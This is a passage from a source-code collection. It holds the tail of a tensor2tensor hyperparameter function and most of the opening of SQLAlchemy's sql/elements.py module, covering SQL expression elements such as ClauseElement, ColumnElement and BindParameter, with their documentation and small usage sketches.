hparams.num_decoder_layers = 10
hparams.num_heads = 4
hparams.hidden_size = 1024
hparams.filter_size = 4096
hparams.batch_size = 1
hparams.layer_prepostprocess_dropout = 0.1
return hparams
| tensorflow/tensor2tensor | tensor2tensor/models/image_transformer.py | Python | apache-2.0 | 37,900 | ["MOE"] | c9323106c139c8795ba1b62238723814620de0f95db3c44edf20467f9ac1affb |
# sql/elements.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Core SQL expression elements, including :class:`.ClauseElement`,
:class:`.ColumnElement`, and derived classes.
"""
from __future__ import unicode_literals
from .. import util, exc, inspection
from . import type_api
from . import operators
from .visitors import Visitable, cloned_traverse, traverse
from .annotation import Annotated
import itertools
from .base import Executable, PARSE_AUTOCOMMIT, Immutable, NO_ARG
from .base import _generative
import numbers
import re
import operator
def _clone(element, **kw):
return element._clone()
def collate(expression, collation):
"""Return the clause ``expression COLLATE collation``.
e.g.::
collate(mycolumn, 'utf8_bin')
produces::
mycolumn COLLATE utf8_bin
"""
expr = _literal_as_binds(expression)
return BinaryExpression(
expr,
_literal_as_text(collation),
operators.collate, type_=expr.type)
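# Illustrative usage sketch, not part of this module: rendering the collate()
# construct documented above. The imports assume an installed SQLAlchemy and
# are deferred so this file's import order is unaffected; exact quoting of the
# collation name may vary by version.
def _collate_usage_sketch():
    from sqlalchemy import collate, column
    expr = collate(column('somecolumn'), 'utf8_bin')
    return str(expr)  # roughly: somecolumn COLLATE utf8_bin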
def between(expr, lower_bound, upper_bound, symmetric=False):
"""Produce a ``BETWEEN`` predicate clause.
E.g.::
from sqlalchemy import between
stmt = select([users_table]).where(between(users_table.c.id, 5, 7))
Would produce SQL resembling::
SELECT id, name FROM user WHERE id BETWEEN :id_1 AND :id_2
The :func:`.between` function is a standalone version of the
:meth:`.ColumnElement.between` method available on all
SQL expressions, as in::
stmt = select([users_table]).where(users_table.c.id.between(5, 7))
All arguments passed to :func:`.between`, including the left side
column expression, are coerced from Python scalar values if
the value is not a :class:`.ColumnElement` subclass. For example,
three fixed values can be compared as in::
print(between(5, 3, 7))
Which would produce::
:param_1 BETWEEN :param_2 AND :param_3
:param expr: a column expression, typically a :class:`.ColumnElement`
instance or alternatively a Python scalar expression to be coerced
into a column expression, serving as the left side of the ``BETWEEN``
expression.
:param lower_bound: a column or Python scalar expression serving as the
lower bound of the right side of the ``BETWEEN`` expression.
:param upper_bound: a column or Python scalar expression serving as the
upper bound of the right side of the ``BETWEEN`` expression.
:param symmetric: if True, will render " BETWEEN SYMMETRIC ". Note
that not all databases support this syntax.
.. versionadded:: 0.9.5
.. seealso::
:meth:`.ColumnElement.between`
"""
expr = _literal_as_binds(expr)
return expr.between(lower_bound, upper_bound, symmetric=symmetric)
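# Illustrative usage sketch, not part of this module: the standalone between()
# documented above also accepts plain Python scalars, which are coerced into
# bound parameters, matching the print(between(5, 3, 7)) example in the
# docstring.
def _between_usage_sketch():
    from sqlalchemy import between
    return str(between(5, 3, 7))  # :param_1 BETWEEN :param_2 AND :param_3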
def literal(value, type_=None):
"""Return a literal clause, bound to a bind parameter.
Literal clauses are created automatically when non-
:class:`.ClauseElement` objects (such as strings, ints, dates, etc.) are
used in a comparison operation with a :class:`.ColumnElement` subclass,
such as a :class:`~sqlalchemy.schema.Column` object. Use this function
to force the generation of a literal clause, which will be created as a
:class:`BindParameter` with a bound value.
:param value: the value to be bound. Can be any Python object supported by
the underlying DB-API, or is translatable via the given type argument.
:param type\_: an optional :class:`~sqlalchemy.types.TypeEngine` which
will provide bind-parameter translation for this literal.
"""
return BindParameter(None, value, type_=type_, unique=True)
def type_coerce(expression, type_):
"""Associate a SQL expression with a particular type, without rendering
``CAST``.
E.g.::
from sqlalchemy import type_coerce
stmt = select([type_coerce(log_table.date_string, StringDateTime())])
The above construct will produce SQL that is usually otherwise unaffected
by the :func:`.type_coerce` call::
SELECT date_string FROM log
However, when result rows are fetched, the ``StringDateTime`` type
will be applied to result rows on behalf of the ``date_string`` column.
A type that features bound-value handling will also have that behavior
take effect when literal values or :func:`.bindparam` constructs are
passed to :func:`.type_coerce` as targets.
For example, if a type implements the :meth:`.TypeEngine.bind_expression`
method or :meth:`.TypeEngine.bind_processor` method or equivalent,
these functions will take effect at statement compilation/execution time
when a literal value is passed, as in::
# bound-value handling of MyStringType will be applied to the
# literal value "some string"
stmt = select([type_coerce("some string", MyStringType)])
:func:`.type_coerce` is similar to the :func:`.cast` function,
except that it does not render the ``CAST`` expression in the resulting
statement.
:param expression: A SQL expression, such as a :class:`.ColumnElement`
expression or a Python string which will be coerced into a bound literal
value.
:param type_: A :class:`.TypeEngine` class or instance indicating
the type to which the expression is coerced.
.. seealso::
:func:`.cast`
"""
type_ = type_api.to_instance(type_)
if hasattr(expression, '__clause_element__'):
return type_coerce(expression.__clause_element__(), type_)
elif isinstance(expression, BindParameter):
bp = expression._clone()
bp.type = type_
return bp
elif not isinstance(expression, Visitable):
if expression is None:
return Null()
else:
return literal(expression, type_=type_)
else:
return Label(None, expression, type_=type_)
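# Illustrative usage sketch, not part of this module: on the code path shown
# above, passing a plain Python value to type_coerce() wraps it as a bound
# literal carrying the requested type, without rendering a CAST.
def _type_coerce_usage_sketch():
    from sqlalchemy import type_coerce, Integer
    bound = type_coerce("5", Integer)
    return bound.type  # an Integer() instance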
def outparam(key, type_=None):
"""Create an 'OUT' parameter for usage in functions (stored procedures),
for databases which support them.
The ``outparam`` can be used like a regular function parameter.
The "output" value will be available from the
:class:`~sqlalchemy.engine.ResultProxy` object via its ``out_parameters``
attribute, which returns a dictionary containing the values.
"""
return BindParameter(
key, None, type_=type_, unique=False, isoutparam=True)
def not_(clause):
"""Return a negation of the given clause, i.e. ``NOT(clause)``.
The ``~`` operator is also overloaded on all
:class:`.ColumnElement` subclasses to produce the
same result.
"""
return operators.inv(_literal_as_binds(clause))
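# Illustrative usage sketch, not part of this module: not_() and the
# overloaded ~ operator both negate a clause; for a simple comparison the
# negation typically renders with the inverse operator.
def _not_usage_sketch():
    from sqlalchemy import not_, column
    expr = not_(column('x') == 5)
    return str(expr)  # typically: x != :x_1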
@inspection._self_inspects
class ClauseElement(Visitable):
"""Base class for elements of a programmatically constructed SQL
expression.
"""
__visit_name__ = 'clause'
_annotations = {}
supports_execution = False
_from_objects = []
bind = None
_is_clone_of = None
is_selectable = False
is_clause_element = True
description = None
_order_by_label_element = None
_is_from_container = False
def _clone(self):
"""Create a shallow copy of this ClauseElement.
This method may be used by a generative API. It's also used as
part of the "deep" copy afforded by a traversal that combines
the _copy_internals() method.
"""
c = self.__class__.__new__(self.__class__)
c.__dict__ = self.__dict__.copy()
ClauseElement._cloned_set._reset(c)
ColumnElement.comparator._reset(c)
# this is a marker that helps to "equate" clauses to each other
# when a Select returns its list of FROM clauses. the cloning
# process leaves around a lot of remnants of the previous clause
# typically in the form of column expressions still attached to the
# old table.
c._is_clone_of = self
return c
@property
def _constructor(self):
"""return the 'constructor' for this ClauseElement.
This is for the purposes for creating a new object of
this type. Usually, it's just the element's __class__.
However, the "Annotated" version of the object overrides
to return the class of its proxied element.
"""
return self.__class__
@util.memoized_property
def _cloned_set(self):
"""Return the set consisting all cloned ancestors of this
ClauseElement.
Includes this ClauseElement. This accessor tends to be used for
FromClause objects to identify 'equivalent' FROM clauses, regardless
of transformative operations.
"""
s = util.column_set()
f = self
while f is not None:
s.add(f)
f = f._is_clone_of
return s
def __getstate__(self):
d = self.__dict__.copy()
d.pop('_is_clone_of', None)
return d
def _annotate(self, values):
"""return a copy of this ClauseElement with annotations
updated by the given dictionary.
"""
return Annotated(self, values)
def _with_annotations(self, values):
"""return a copy of this ClauseElement with annotations
replaced by the given dictionary.
"""
return Annotated(self, values)
def _deannotate(self, values=None, clone=False):
"""return a copy of this :class:`.ClauseElement` with annotations
removed.
:param values: optional tuple of individual values
to remove.
"""
if clone:
# clone is used when we are also copying
# the expression for a deep deannotation
return self._clone()
else:
# if no clone, since we have no annotations we return
# self
return self
def _execute_on_connection(self, connection, multiparams, params):
return connection._execute_clauseelement(self, multiparams, params)
def unique_params(self, *optionaldict, **kwargs):
"""Return a copy with :func:`bindparam()` elements replaced.
Same functionality as ``params()``, except adds `unique=True`
to affected bind parameters so that multiple statements can be
used.
"""
return self._params(True, optionaldict, kwargs)
def params(self, *optionaldict, **kwargs):
"""Return a copy with :func:`bindparam()` elements replaced.
Returns a copy of this ClauseElement with :func:`bindparam()`
elements replaced with values taken from the given dictionary::
>>> clause = column('x') + bindparam('foo')
>>> print clause.compile().params
{'foo':None}
>>> print clause.params({'foo':7}).compile().params
{'foo':7}
"""
return self._params(False, optionaldict, kwargs)
def _params(self, unique, optionaldict, kwargs):
if len(optionaldict) == 1:
kwargs.update(optionaldict[0])
elif len(optionaldict) > 1:
raise exc.ArgumentError(
"params() takes zero or one positional dictionary argument")
def visit_bindparam(bind):
if bind.key in kwargs:
bind.value = kwargs[bind.key]
bind.required = False
if unique:
bind._convert_to_unique()
return cloned_traverse(self, {}, {'bindparam': visit_bindparam})
def compare(self, other, **kw):
"""Compare this ClauseElement to the given ClauseElement.
Subclasses should override the default behavior, which is a
straight identity comparison.
\**kw are arguments consumed by subclass compare() methods and
may be used to modify the criteria for comparison.
(see :class:`.ColumnElement`)
"""
return self is other
def _copy_internals(self, clone=_clone, **kw):
"""Reassign internal elements to be clones of themselves.
Called during a copy-and-traverse operation on newly
shallow-copied elements to create a deep copy.
The given clone function should be used, which may be applying
additional transformations to the element (i.e. replacement
traversal, cloned traversal, annotations).
"""
pass
def get_children(self, **kwargs):
"""Return immediate child elements of this :class:`.ClauseElement`.
This is used for visit traversal.
\**kwargs may contain flags that change the collection that is
returned, for example to return a subset of items in order to
cut down on larger traversals, or to return child items from a
different context (such as schema-level collections instead of
clause-level).
"""
return []
def self_group(self, against=None):
"""Apply a 'grouping' to this :class:`.ClauseElement`.
This method is overridden by subclasses to return a
"grouping" construct, i.e. parenthesis. In particular
it's used by "binary" expressions to provide a grouping
around themselves when placed into a larger expression,
as well as by :func:`.select` constructs when placed into
the FROM clause of another :func:`.select`. (Note that
subqueries should normally be created using the
:meth:`.Select.alias` method, as many platforms require
nested SELECT statements to be named).
As expressions are composed together, the application of
:meth:`self_group` is automatic - end-user code should never
need to use this method directly. Note that SQLAlchemy's
clause constructs take operator precedence into account -
so parenthesis might not be needed, for example, in
an expression like ``x OR (y AND z)`` - AND takes precedence
over OR.
The base :meth:`self_group` method of :class:`.ClauseElement`
just returns self.
"""
return self
@util.dependencies("sqlalchemy.engine.default")
def compile(self, default, bind=None, dialect=None, **kw):
"""Compile this SQL expression.
The return value is a :class:`~.Compiled` object.
Calling ``str()`` or ``unicode()`` on the returned value will yield a
string representation of the result. The
:class:`~.Compiled` object also can return a
dictionary of bind parameter names and values
using the ``params`` accessor.
:param bind: An ``Engine`` or ``Connection`` from which a
``Compiled`` will be acquired. This argument takes precedence over
this :class:`.ClauseElement`'s bound engine, if any.
:param column_keys: Used for INSERT and UPDATE statements, a list of
column names which should be present in the VALUES clause of the
compiled statement. If ``None``, all columns from the target table
object are rendered.
:param dialect: A ``Dialect`` instance from which a ``Compiled``
will be acquired. This argument takes precedence over the `bind`
argument as well as this :class:`.ClauseElement`'s bound engine,
if any.
:param inline: Used for INSERT statements, for a dialect which does
not support inline retrieval of newly generated primary key
columns, will force the expression used to create the new primary
key value to be rendered inline within the INSERT statement's
VALUES clause. This typically refers to Sequence execution but may
also refer to any server-side default generation function
associated with a primary key `Column`.
:param compile_kwargs: optional dictionary of additional parameters
that will be passed through to the compiler within all "visit"
methods. This allows any custom flag to be passed through to
a custom compilation construct, for example. It is also used
for the case of passing the ``literal_binds`` flag through::
from sqlalchemy.sql import table, column, select
t = table('t', column('x'))
s = select([t]).where(t.c.x == 5)
print s.compile(compile_kwargs={"literal_binds": True})
.. versionadded:: 0.9.0
.. seealso::
:ref:`faq_sql_expression_string`
"""
if not dialect:
if bind:
dialect = bind.dialect
elif self.bind:
dialect = self.bind.dialect
bind = self.bind
else:
dialect = default.DefaultDialect()
return self._compiler(dialect, bind=bind, **kw)
def _compiler(self, dialect, **kw):
"""Return a compiler appropriate for this ClauseElement, given a
Dialect."""
return dialect.statement_compiler(dialect, self, **kw)
def __str__(self):
if util.py3k:
return str(self.compile())
else:
return unicode(self.compile()).encode('ascii', 'backslashreplace')
def __and__(self, other):
"""'and' at the ClauseElement level.
.. deprecated:: 0.9.5 - conjunctions are intended to be
at the :class:`.ColumnElement` level.
"""
return and_(self, other)
def __or__(self, other):
"""'or' at the ClauseElement level.
.. deprecated:: 0.9.5 - conjunctions are intended to be
at the :class:`.ColumnElement` level.
"""
return or_(self, other)
def __invert__(self):
if hasattr(self, 'negation_clause'):
return self.negation_clause
else:
return self._negate()
def _negate(self):
return UnaryExpression(
self.self_group(against=operators.inv),
operator=operators.inv,
negate=None)
def __bool__(self):
raise TypeError("Boolean value of this clause is not defined")
__nonzero__ = __bool__
def __repr__(self):
friendly = self.description
if friendly is None:
return object.__repr__(self)
else:
return '<%s.%s at 0x%x; %s>' % (
self.__module__, self.__class__.__name__, id(self), friendly)
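# Illustrative usage sketch, not part of this module: two ClauseElement
# behaviours documented in the methods above, using the 1.x select([...]) API.
# params() rebinds values onto bindparam() elements, and compile() with the
# literal_binds compile_kwargs flag renders literal values inline. The helper
# name is hypothetical.
def _clauseelement_usage_sketch():
    from sqlalchemy import bindparam
    from sqlalchemy.sql import table, column, select
    clause = column('x') + bindparam('foo')
    rebound = clause.params({'foo': 7}).compile().params  # {'foo': 7}
    t = table('t', column('x'))
    stmt = select([t]).where(t.c.x == 5)
    inline_sql = str(stmt.compile(compile_kwargs={"literal_binds": True}))
    return rebound, inline_sql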
class ColumnElement(operators.ColumnOperators, ClauseElement):
"""Represent a column-oriented SQL expression suitable for usage in the
"columns" clause, WHERE clause etc. of a statement.
While the most familiar kind of :class:`.ColumnElement` is the
:class:`.Column` object, :class:`.ColumnElement` serves as the basis
for any unit that may be present in a SQL expression, including
the expressions themselves, SQL functions, bound parameters,
literal expressions, keywords such as ``NULL``, etc.
:class:`.ColumnElement` is the ultimate base class for all such elements.
A wide variety of SQLAlchemy Core functions work at the SQL expression
level, and are intended to accept instances of :class:`.ColumnElement` as
arguments. These functions will typically document that they accept a
"SQL expression" as an argument. What this means in terms of SQLAlchemy
usually refers to an input which is either already in the form of a
:class:`.ColumnElement` object, or a value which can be **coerced** into
one. The coercion rules followed by most, but not all, SQLAlchemy Core
functions with regards to SQL expressions are as follows:
* a literal Python value, such as a string, integer or floating
point value, boolean, datetime, ``Decimal`` object, or virtually
any other Python object, will be coerced into a "literal bound
value". This generally means that a :func:`.bindparam` will be
produced featuring the given value embedded into the construct; the
resulting :class:`.BindParameter` object is an instance of
:class:`.ColumnElement`. The Python value will ultimately be sent
to the DBAPI at execution time as a parameterized argument to the
``execute()`` or ``executemany()`` methods, after SQLAlchemy
type-specific converters (e.g. those provided by any associated
:class:`.TypeEngine` objects) are applied to the value.
* any special object value, typically ORM-level constructs, which
feature a method called ``__clause_element__()``. The Core
expression system looks for this method when an object of otherwise
unknown type is passed to a function that is looking to coerce the
argument into a :class:`.ColumnElement` expression. The
``__clause_element__()`` method, if present, should return a
:class:`.ColumnElement` instance. The primary use of
``__clause_element__()`` within SQLAlchemy is that of class-bound
attributes on ORM-mapped classes; a ``User`` class which contains a
mapped attribute named ``.name`` will have a method
``User.name.__clause_element__()`` which when invoked returns the
:class:`.Column` called ``name`` associated with the mapped table.
* The Python ``None`` value is typically interpreted as ``NULL``,
which in SQLAlchemy Core produces an instance of :func:`.null`.
A :class:`.ColumnElement` provides the ability to generate new
:class:`.ColumnElement`
objects using Python expressions. This means that Python operators
such as ``==``, ``!=`` and ``<`` are overloaded to mimic SQL operations,
and allow the instantiation of further :class:`.ColumnElement` instances
which are composed from other, more fundamental :class:`.ColumnElement`
objects. For example, two :class:`.ColumnClause` objects can be added
together with the addition operator ``+`` to produce
a :class:`.BinaryExpression`.
Both :class:`.ColumnClause` and :class:`.BinaryExpression` are subclasses
of :class:`.ColumnElement`::
>>> from sqlalchemy.sql import column
>>> column('a') + column('b')
<sqlalchemy.sql.expression.BinaryExpression object at 0x101029dd0>
>>> print column('a') + column('b')
a + b
.. seealso::
:class:`.Column`
:func:`.expression.column`
"""
__visit_name__ = 'column'
primary_key = False
foreign_keys = []
_label = None
"""The named label that can be used to target
this column in a result set.
This label is almost always the label used when
rendering <expr> AS <label> in a SELECT statement. It also
refers to a name that this column expression can be located from
in a result set.
For a regular Column bound to a Table, this is typically the label
<tablename>_<columnname>. For other constructs, different rules
may apply, such as anonymized labels and others.
"""
key = None
"""the 'key' that in some circumstances refers to this object in a
Python namespace.
This typically refers to the "key" of the column as present in the
``.c`` collection of a selectable, e.g. sometable.c["somekey"] would
return a Column with a .key of "somekey".
"""
_key_label = None
"""A label-based version of 'key' that in some circumstances refers
to this object in a Python namespace.
_key_label comes into play when a select() statement is constructed with
apply_labels(); in this case, all Column objects in the ``.c`` collection
are rendered as <tablename>_<columnname> in SQL; this is essentially the
value of ._label. But to locate those columns in the ``.c`` collection,
the name is along the lines of <tablename>_<key>; that's the typical
value of .key_label.
"""
_render_label_in_columns_clause = True
"""A flag used by select._columns_plus_names that helps to determine
whether we are actually going to render in terms of "SELECT <col> AS <label>".
This flag can be returned as False for some Column objects that want
to be rendered as simple "SELECT <col>"; typically columns that don't have
any parent table and are named the same as what the label would be
in any case.
"""
_resolve_label = None
"""The name that should be used to identify this ColumnElement in a
select() object when "label resolution" logic is used; this refers
to using a string name in an expression like order_by() or group_by()
that wishes to target a labeled expression in the columns clause.
The name is distinct from that of .name or ._label to account for the case
where anonymizing logic may be used to change the name that's actually
rendered at compile time; this attribute should hold onto the original
name that was user-assigned when producing a .label() construct.
"""
_allow_label_resolve = True
"""A flag that can be flipped to prevent a column from being resolvable
by string label name."""
_alt_names = ()
def self_group(self, against=None):
if (against in (operators.and_, operators.or_, operators._asbool) and
self.type._type_affinity
is type_api.BOOLEANTYPE._type_affinity):
return AsBoolean(self, operators.istrue, operators.isfalse)
else:
return self
def _negate(self):
if self.type._type_affinity is type_api.BOOLEANTYPE._type_affinity:
return AsBoolean(self, operators.isfalse, operators.istrue)
else:
return super(ColumnElement, self)._negate()
@util.memoized_property
def type(self):
return type_api.NULLTYPE
@util.memoized_property
def comparator(self):
try:
comparator_factory = self.type.comparator_factory
except AttributeError:
raise TypeError(
"Object %r associated with '.type' attribute "
"is not a TypeEngine class or object" % self.type)
else:
return comparator_factory(self)
def __getattr__(self, key):
try:
return getattr(self.comparator, key)
except AttributeError:
raise AttributeError(
'Neither %r object nor %r object has an attribute %r' % (
type(self).__name__,
type(self.comparator).__name__,
key)
)
def operate(self, op, *other, **kwargs):
return op(self.comparator, *other, **kwargs)
def reverse_operate(self, op, other, **kwargs):
return op(other, self.comparator, **kwargs)
def _bind_param(self, operator, obj):
return BindParameter(None, obj,
_compared_to_operator=operator,
_compared_to_type=self.type, unique=True)
@property
def expression(self):
"""Return a column expression.
Part of the inspection interface; returns self.
"""
return self
@property
def _select_iterable(self):
return (self, )
@util.memoized_property
def base_columns(self):
return util.column_set(c for c in self.proxy_set
if not hasattr(c, '_proxies'))
@util.memoized_property
def proxy_set(self):
s = util.column_set([self])
if hasattr(self, '_proxies'):
for c in self._proxies:
s.update(c.proxy_set)
return s
def shares_lineage(self, othercolumn):
"""Return True if the given :class:`.ColumnElement`
has a common ancestor to this :class:`.ColumnElement`."""
return bool(self.proxy_set.intersection(othercolumn.proxy_set))
def _compare_name_for_result(self, other):
"""Return True if the given column element compares to this one
when targeting within a result row."""
return hasattr(other, 'name') and hasattr(self, 'name') and \
other.name == self.name
def _make_proxy(
self, selectable, name=None, name_is_truncatable=False, **kw):
"""Create a new :class:`.ColumnElement` representing this
:class:`.ColumnElement` as it appears in the select list of a
descending selectable.
"""
if name is None:
name = self.anon_label
if self.key:
key = self.key
else:
try:
key = str(self)
except exc.UnsupportedCompilationError:
key = self.anon_label
else:
key = name
co = ColumnClause(
_as_truncated(name) if name_is_truncatable else name,
type_=getattr(self, 'type', None),
_selectable=selectable
)
co._proxies = [self]
if selectable._is_clone_of is not None:
co._is_clone_of = \
selectable._is_clone_of.columns.get(key)
selectable._columns[key] = co
return co
def compare(self, other, use_proxies=False, equivalents=None, **kw):
"""Compare this ColumnElement to another.
Special arguments understood:
:param use_proxies: when True, consider two columns that
share a common base column as equivalent (i.e. shares_lineage())
:param equivalents: a dictionary of columns as keys mapped to sets
of columns. If the given "other" column is present in this
dictionary, if any of the columns in the corresponding set() pass
the comparison test, the result is True. This is used to expand the
comparison to other columns that may be known to be equivalent to
this one via foreign key or other criterion.
"""
to_compare = (other, )
if equivalents and other in equivalents:
to_compare = equivalents[other].union(to_compare)
for oth in to_compare:
if use_proxies and self.shares_lineage(oth):
return True
elif hash(oth) == hash(self):
return True
else:
return False
def cast(self, type_):
"""Produce a type cast, i.e. ``CAST(<expression> AS <type>)``.
This is a shortcut to the :func:`~.expression.cast` function.
.. versionadded:: 1.0.7
"""
return Cast(self, type_)
def label(self, name):
"""Produce a column label, i.e. ``<columnname> AS <name>``.
This is a shortcut to the :func:`~.expression.label` function.
if 'name' is None, an anonymous label name will be generated.
"""
return Label(name, self, self.type)
@util.memoized_property
def anon_label(self):
"""provides a constant 'anonymous label' for this ColumnElement.
This is a label() expression which will be named at compile time.
The same label() is returned each time anon_label is called so
that expressions can reference anon_label multiple times, producing
the same label name at compile time.
the compiler uses this function automatically at compile time
for expressions that are known to be 'unnamed' like binary
expressions and function calls.
"""
while self._is_clone_of is not None:
self = self._is_clone_of
return _anonymous_label(
'%%(%d %s)s' % (id(self), getattr(self, 'name', 'anon'))
)
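# Illustrative usage sketch, not part of this module: the coercion rules
# described in the ColumnElement docstring above. Composing two column
# expressions yields a BinaryExpression, and comparing against a plain Python
# value coerces that value into a BindParameter on the right-hand side.
def _columnelement_coercion_sketch():
    from sqlalchemy.sql import column
    summed = column('a') + column('b')    # a BinaryExpression rendering "a + b"
    compared = column('a') == 'wendy'     # .right is an anonymous BindParameter
    return str(summed), repr(compared.right)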
class BindParameter(ColumnElement):
"""Represent a "bound expression".
:class:`.BindParameter` is invoked explicitly using the
:func:`.bindparam` function, as in::
from sqlalchemy import bindparam
stmt = select([users_table]).\\
where(users_table.c.name == bindparam('username'))
Detailed discussion of how :class:`.BindParameter` is used is
at :func:`.bindparam`.
.. seealso::
:func:`.bindparam`
"""
__visit_name__ = 'bindparam'
_is_crud = False
def __init__(self, key, value=NO_ARG, type_=None,
unique=False, required=NO_ARG,
quote=None, callable_=None,
isoutparam=False,
_compared_to_operator=None,
_compared_to_type=None):
"""Produce a "bound expression".
The return value is an instance of :class:`.BindParameter`; this
is a :class:`.ColumnElement` subclass which represents a so-called
"placeholder" value in a SQL expression, the value of which is
supplied at the point at which the statement is executed against a
database connection.
In SQLAlchemy, the :func:`.bindparam` construct has
the ability to carry along the actual value that will be ultimately
used at expression time. In this way, it serves not just as
a "placeholder" for eventual population, but also as a means of
representing so-called "unsafe" values which should not be rendered
directly in a SQL statement, but rather should be passed along
to the :term:`DBAPI` as values which need to be correctly escaped
and potentially handled for type-safety.
When using :func:`.bindparam` explicitly, the use case is typically
one of traditional deferment of parameters; the :func:`.bindparam`
construct accepts a name which can then be referred to at execution
time::
from sqlalchemy import bindparam
stmt = select([users_table]).\\
where(users_table.c.name == bindparam('username'))
The above statement, when rendered, will produce SQL similar to::
SELECT id, name FROM user WHERE name = :username
In order to populate the value of ``:username`` above, the value
would typically be applied at execution time to a method
like :meth:`.Connection.execute`::
result = connection.execute(stmt, username='wendy')
Explicit use of :func:`.bindparam` is also common when producing
UPDATE or DELETE statements that are to be invoked multiple times,
where the WHERE criterion of the statement is to change on each
invocation, such as::
stmt = (users_table.update().
where(user_table.c.name == bindparam('username')).
values(fullname=bindparam('fullname'))
)
connection.execute(
stmt, [{"username": "wendy", "fullname": "Wendy Smith"},
{"username": "jack", "fullname": "Jack Jones"},
]
)
SQLAlchemy's Core expression system makes wide use of
:func:`.bindparam` in an implicit sense. It is typical that Python
literal values passed to virtually all SQL expression functions are
coerced into fixed :func:`.bindparam` constructs. For example, given
a comparison operation such as::
expr = users_table.c.name == 'Wendy'
The above expression will produce a :class:`.BinaryExpression`
construct, where the left side is the :class:`.Column` object
representing the ``name`` column, and the right side is a
:class:`.BindParameter` representing the literal value::
print(repr(expr.right))
BindParameter('%(4327771088 name)s', 'Wendy', type_=String())
The expression above will render SQL such as::
user.name = :name_1
Where the ``:name_1`` parameter name is an anonymous name. The
actual string ``Wendy`` is not in the rendered string, but is carried
along where it is later used within statement execution. If we
invoke a statement like the following::
stmt = select([users_table]).where(users_table.c.name == 'Wendy')
result = connection.execute(stmt)
We would see SQL logging output as::
SELECT "user".id, "user".name
FROM "user"
WHERE "user".name = %(name_1)s
{'name_1': 'Wendy'}
Above, we see that ``Wendy`` is passed as a parameter to the database,
while the placeholder ``:name_1`` is rendered in the appropriate form
for the target database, in this case the Postgresql database.
Similarly, :func:`.bindparam` is invoked automatically
when working with :term:`CRUD` statements as far as the "VALUES"
portion is concerned. The :func:`.insert` construct produces an
``INSERT`` expression which will, at statement execution time,
generate bound placeholders based on the arguments passed, as in::
stmt = users_table.insert()
result = connection.execute(stmt, name='Wendy')
The above will produce SQL output as::
INSERT INTO "user" (name) VALUES (%(name)s)
{'name': 'Wendy'}
The :class:`.Insert` construct, at compilation/execution time,
rendered a single :func:`.bindparam` mirroring the column
name ``name`` as a result of the single ``name`` parameter
we passed to the :meth:`.Connection.execute` method.
:param key:
the key (e.g. the name) for this bind param.
Will be used in the generated
SQL statement for dialects that use named parameters. This
value may be modified when part of a compilation operation,
if other :class:`BindParameter` objects exist with the same
key, or if its length is too long and truncation is
required.
:param value:
Initial value for this bind param. Will be used at statement
execution time as the value for this parameter passed to the
DBAPI, if no other value is indicated to the statement execution
method for this particular parameter name. Defaults to ``None``.
:param callable\_:
A callable function that takes the place of "value". The function
will be called at statement execution time to determine the
ultimate value. Used for scenarios where the actual bind
value cannot be determined at the point at which the clause
construct is created, but embedded bind values are still desirable.
:param type\_:
A :class:`.TypeEngine` class or instance representing an optional
datatype for this :func:`.bindparam`. If not passed, a type
may be determined automatically for the bind, based on the given
value; for example, trivial Python types such as ``str``,
``int``, ``bool``
may result in the :class:`.String`, :class:`.Integer` or
:class:`.Boolean` types being automatically selected.
The type of a :func:`.bindparam` is significant especially in that
the type will apply pre-processing to the value before it is
passed to the database. For example, a :func:`.bindparam` which
refers to a datetime value, and is specified as holding the
:class:`.DateTime` type, may apply conversion needed to the
value (such as stringification on SQLite) before passing the value
to the database.
:param unique:
if True, the key name of this :class:`.BindParameter` will be
modified if another :class:`.BindParameter` of the same name
already has been located within the containing
expression. This flag is used generally by the internals
when producing so-called "anonymous" bound expressions; it
isn't generally applicable to explicitly-named :func:`.bindparam`
constructs.
:param required:
If ``True``, a value is required at execution time. If not passed,
it defaults to ``True`` if neither :paramref:`.bindparam.value`
or :paramref:`.bindparam.callable` were passed. If either of these
parameters are present, then :paramref:`.bindparam.required`
defaults to ``False``.
.. versionchanged:: 0.8 If the ``required`` flag is not specified,
it will be set automatically to ``True`` or ``False`` depending
on whether or not the ``value`` or ``callable`` parameters
were specified.
:param quote:
True if this parameter name requires quoting and is not
currently known as a SQLAlchemy reserved word; this currently
only applies to the Oracle backend, where bound names must
sometimes be quoted.
:param isoutparam:
if True, the parameter should be treated like a stored procedure
"OUT" parameter. This applies to backends such as Oracle which
support OUT parameters.
.. seealso::
:ref:`coretutorial_bind_param`
:ref:`coretutorial_insert_expressions`
:func:`.outparam`
"""
if isinstance(key, ColumnClause):
type_ = key.type
key = key.key
if required is NO_ARG:
required = (value is NO_ARG and callable_ is None)
if value is NO_ARG:
value = None
if quote is not None:
key = quoted_name(key, quote)
if unique:
self.key = _anonymous_label('%%(%d %s)s' % (id(self), key
or 'param'))
else:
self.key = key or _anonymous_label('%%(%d param)s'
% id(self))
# identifying key that won't change across
# clones, used to identify the bind's logical
# identity
self._identifying_key = self.key
# key that was passed in the first place, used to
# generate new keys
self._orig_key = key or 'param'
self.unique = unique
self.value = value
self.callable = callable_
self.isoutparam = isoutparam
self.required = required
if type_ is None:
if _compared_to_type is not None:
self.type = \
_compared_to_type.coerce_compared_value(
_compared_to_operator, value)
else:
self.type = type_api._type_map.get(type(value),
type_api.NULLTYPE)
elif isinstance(type_, type):
self.type = type_()
else:
self.type = type_
def _with_value(self, value):
"""Return a copy of this :class:`.BindParameter` with the given value
set.
"""
cloned = self._clone()
cloned.value = value
cloned.callable = None
cloned.required = False
if cloned.type is type_api.NULLTYPE:
cloned.type = type_api._type_map.get(type(value),
type_api.NULLTYPE)
return cloned
@property
def effective_value(self):
"""Return the value of this bound parameter,
taking into account if the ``callable`` parameter
was set.
The ``callable`` value will be evaluated
and returned if present, else ``value``.
"""
if self.callable:
return self.callable()
else:
return self.value
def _clone(self):
c = ClauseElement._clone(self)
if self.unique:
c.key = _anonymous_label('%%(%d %s)s' % (id(c), c._orig_key
or 'param'))
return c
def _convert_to_unique(self):
if not self.unique:
self.unique = True
self.key = _anonymous_label(
'%%(%d %s)s' % (id(self), self._orig_key or 'param'))
def compare(self, other, **kw):
"""Compare this :class:`BindParameter` to the given
clause."""
return isinstance(other, BindParameter) \
and self.type._compare_type_affinity(other.type) \
and self.value == other.value
def __getstate__(self):
"""execute a deferred value for serialization purposes."""
d = self.__dict__.copy()
v = self.value
if self.callable:
v = self.callable()
d['callable'] = None
d['value'] = v
return d
def __repr__(self):
